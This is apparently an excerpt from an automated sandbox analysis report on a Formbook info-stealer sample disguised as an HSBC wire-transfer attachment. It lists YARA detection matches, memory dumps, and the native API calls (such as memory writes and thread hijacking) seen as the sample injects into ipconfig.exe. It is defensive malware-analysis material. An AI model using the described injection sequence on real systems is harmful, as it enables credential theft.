          Source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.6.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.6.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.6.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.6.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.4.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.4.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.8.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.8.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000000.287427300.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000000.287427300.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000010.00000002.547820066.0000000003380000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000010.00000002.547820066.0000000003380000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.346806023.0000000001930000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.346806023.0000000001930000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000010.00000002.547165223.0000000002C60000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000010.00000002.547165223.0000000002C60000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.345755031.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.345755031.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.346832554.0000000001960000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.346832554.0000000001960000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.290604348.0000000003AF1000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.290604348.0000000003AF1000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000C.00000000.322367188.000000000FC1F000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000C.00000000.322367188.000000000FC1F000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000000.287940636.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000000.287940636.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000010.00000002.547580773.0000000002DD0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000010.00000002.547580773.0000000002DD0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.290259549.00000000038AD000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.290259549.00000000038AD000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 0_2_00C68250
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 0_2_00C6D2F8
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_00401030
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_0041E30C
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_0041DB36
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_00402D90
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_00409E5F
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_00409E60
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_0041D6AE
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_00402FB0
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_00C05C24
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_01644120
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_0162F900
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_016499BF
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_016FE824
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_0164A830
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_016E1002
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_016F28EC
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_016520A0
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_016F20A8
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_0163B090
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_0164AB40
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_016F2B28
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_0164A309
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_016D23E3
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_016E03DA
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_016EDBD2
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_0165ABD8
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_0165EBB0
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_016DFA2B
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_016E4AEF
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_016F22AE
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_016F1D55
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_01620D20
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_016F2D07
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_0163D5E0
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_016F25DD
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_01652581
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_016E2D82
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_016ED466
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_0163841F
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_016E4496
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_016F1FF1
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_016FDFCE
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_01646E30
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_016ED616
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_016F2EF7
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_0366AB40
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_03712B28
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_0370DBD2
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_037003DA
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_0367EBB0
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_036FFA2B
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_037122AE
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_03664120
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_0364F900
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_036699BF
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_0371E824
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_0366A830
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_03701002
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_037128EC
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_036720A0
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_037120A8
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_0365B090
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_03711FF1
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_0371DFCE
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_03666E30
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_0370D616
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_03712EF7
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_03711D55
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_03640D20
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_03712D07
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_0365D5E0
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_037125DD
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_03672581
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_0370D466
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_0365841F
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_02C7D6AE
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_02C69E5F
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_02C69E60
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_02C62FB0
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_02C62D90
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: String function: 0162B150 appears 133 times
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: String function: 0364B150 appears 72 times
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_0041A360 NtCreateFile,
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_0041A410 NtReadFile,
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_0041A490 NtClose,
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_0041A540 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_0041A35A NtCreateFile,
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_0041A3B2 NtCreateFile,
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_01669910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_016699A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_01669860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_01669840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_016698F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_01669A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_01669A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_01669A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_01669540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_016695D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_01669710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_016697A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_01669780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_01669660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_016696E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_01669950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_016699D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_0166B040 NtSuspendThread,
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_01669820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_016698A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_01669B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_0166A3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_01669A10 NtQuerySection,
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_01669A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_01669560 NtWriteFile,
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_01669520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_0166AD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_016695F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_01669760 NtOpenProcess,
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_0166A770 NtOpenThread,
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_01669770 NtSetInformationFile,
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_01669730 NtQueryVirtualMemory,
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_0166A710 NtOpenProcessToken,
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_01669FE0 NtCreateMutant,
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_01669670 NtQueryInformationProcess,
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_01669650 NtQueryValueKey,
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_01669610 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe | Code function: 6_2_016696D0 NtCreateKey,
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_03689A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_03689910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_036899A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_03689860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_03689840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_03689710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_03689FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_03689780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_036896E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_036896D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_03689540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_036895D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_03689B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_0368A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_03689A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_03689A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_03689A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_03689A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_03689950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_036899D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_0368B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_03689820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_036898F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_036898A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_03689760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_0368A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_03689770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_03689730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_0368A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_036897A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_03689660 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_03689670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_03689650 NtQueryValueKey,
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_03689610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_03689560 NtWriteFile,
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_03689520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_0368AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_036895F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_02C7A360 NtCreateFile,
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_02C7A490 NtClose,
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_02C7A410 NtReadFile,
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_02C7A3B2 NtCreateFile,
          Source: C:\Windows\SysWOW64\ipconfig.exe | Code function: 16_2_02C7A35A NtCreateFile,
          Source: HSBC ... Wire Transfer Copy.exe, 00000000.00000000.278790638.0000000000456000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameISectionEnt.exe. vs HSBC ... Wire Transfer Copy.exe
          Source: HSBC ... Wire Transfer Copy.exe, 00000000.00000002.293103917.0000000005CD0000.00000004.00020000.sdmp | Binary or memory string: OriginalFilenameUI.dll@ vs HSBC ... Wire Transfer Copy.exe
          Source: HSBC ... Wire Transfer Copy.exe, 00000000.00000002.289914483.00000000028A1000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameInnerException.dll" vs HSBC ... Wire Transfer Copy.exe
          Source: HSBC ... Wire Transfer Copy.exe, 00000000.00000002.292767031.0000000005850000.00000004.00020000.sdmp | Binary or memory string: OriginalFilenameInnerException.dll" vs HSBC ... Wire Transfer Copy.exe
          Source: HSBC ... Wire Transfer Copy.exe, 00000000.00000002.290051006.000000000296B000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameInnerException.dll" vs HSBC ... Wire Transfer Copy.exe
